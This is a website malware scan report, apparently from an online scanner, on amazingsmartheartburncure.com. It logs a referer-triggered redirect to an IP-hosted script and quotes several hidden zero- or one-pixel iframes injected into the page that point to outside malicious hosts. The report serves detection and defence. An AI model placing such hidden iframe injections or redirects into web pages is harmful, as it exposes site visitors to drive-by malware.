Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://amazingsmartheartburncure.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: amazingsmartheartburncure.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 14:44:31 GMT Location: http://195.242.161.162/stats/priemIframe.php Server: Apache/2.2.16 (Debian) Content-Length: 347 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://amazingsmartheartburncure.com/ | 200 OK Content-Length: 3204 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://raffi-kadaffi.com/foto <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://raffi-kadaffi.com/foto"> Hidden iFrame found. size: 10x10 style: hidden src: http://195.242.161.162/stats/priemiframe.php?hashftp=6143b71f32bbbf07facdb6931e571eaa&hashpage=d96fcbee898b1396d6308d0915e6b560 <iframe src="http://195.242.161.162/stats/priemiframe.php?hashftp=6143b71f32bbbf07facdb6931e571eaa&hashpage=d96fcbee898b1396d6308d0915e6b560" width=10 border=1 height=10 style="visibility:hidden"> Hidden iFrame found. The same iFrame was found in 18 websites. size: 0x0 src: http://javanext.in/forum/ <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://javanext.in/forum/"> Hidden iFrame found. size: 1x1 src: http://newgermani.in/vb/ <iframe width="1" height="1" frameborder="0" scrolling="no" src="http://newgermani.in/vb/"> | ||
http://pakomanfunds.com.pk/images/contactus.php | 500 Can't connect to pakomanfunds.com.pk:80 (Bad hostname) Content-Length: 170 Content-Type: text/plain | clean |
http://pakomanfunds.com.pk/test404page.js | 500 Can't connect to pakomanfunds.com.pk:80 (Bad hostname) Content-Length: 170 Content-Type: text/plain | clean |
http://smartbucks.ru/javascript/promo/global.js | 200 OK Content-Length: 2845 Content-Type: application/x-javascript | clean |
http://smartbucks.ru/javascript/promo/popunder.js | 200 OK Content-Length: 817 Content-Type: application/x-javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=amazingsmartheartburncure.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://amazingsmartheartburncure.com/
Result: amazingsmartheartburncure.com is not infected or malware details are not published yet.
Result: amazingsmartheartburncure.com is not infected or malware details are not published yet.